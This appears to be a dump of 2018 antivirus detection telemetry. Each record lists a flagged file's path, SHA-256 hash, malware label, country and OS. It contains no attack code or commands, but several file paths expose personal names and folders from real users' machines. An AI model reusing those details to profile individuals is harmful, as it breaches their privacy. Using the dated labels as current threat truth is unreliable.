  Row(detection=Row(filename='avscan-20181102-061114-127ec2aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061114-127EC2AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054205-005107e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054205-005107E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061703-e2e8aad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061703-E2E8AAD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050949-7e88975e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050949-7E88975E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060352-0b6e1736', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060352-0B6E1736', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052914-34ba4b5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052914-34BA4B5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055534-e24b77f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055534-E24B77F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060813-a7263daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060813-A7263DAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-231290b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-231290B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060703-7cdf4efc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060703-7CDF4EFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052752-03a8dc11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052752-03A8DC11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053039-67a9d20e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053039-67A9D20E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060500-338e581b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060500-338E581B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055353-a6231081', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055353-A6231081', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052732-f7c4733a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052732-F7C4733A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053039-67845885', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053039-67845885', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055107-4311f7fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055107-4311F7FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052810-0eaf6744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052810-0EAF6744', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062300-b7a19168', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062300-B7A19168', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053349-d8b3e89c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053349-D8B3E89C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060220-d43e23b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060220-D43E23B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050820-49639b43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050820-49639B43', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053311-c21af705', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053311-C21AF705', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055740-2d8fa754', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055740-2D8FA754', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060115-adc719d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060115-ADC719D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054336-364c6399', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054336-364C6399', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053751-692381a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053751-692381A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050623-034cc70e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050623-034CC70E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060924-d13313fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060924-D13313FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050822-4a49bc16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050822-4A49BC16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060159-c8389a25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060159-C8389A25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060907-c6c8e62e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060907-C6C8E62E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='7d6121707905105e9d6af93e200522b7ba770e8b08bae343a129ff950723e6a3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055420-b6211bf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055420-B6211BF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054310-273497ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054310-273497CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:05:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053427-ef87076a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053427-EF87076A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055715-1ee31b0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055715-1EE31B0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053317-c5870220', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053317-C5870220', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062344-d1839135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062344-D1839135', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051218-d759b279', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051218-D759B279', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gالاشباح .exe', filepath='\\?\\J:\\العاب\\الاشباح\\gالاشباح .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='0a4cb8c217235fa1c2ce0f45848f1f2dd353c29a18867f42827e9a8b96afdb2b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='138452618526670.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\138452618526670.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154939-81a4161d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154939-81A4161D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T23:09:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T05:43:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110742-a68195b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-110634-9A47DAA6\\AVSCAN-20181101-110742-A68195B1', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:07:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='komp03.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\komp03\\komp03.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='neff-michael.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Neff-Michael.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='494a63825e6601449a227403d96e38e420501e8b9e0d9853426ba4e841cb34c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155455-b6d0442b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155455-B6D0442B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142336-2f1ba212', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb904b13\\AVSCAN-20181101-142242-2577798A\\AVSCAN-20181101-142336-2F1BA212', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:23:36Z'), dt=datetime.date(2018, 11, 1)),
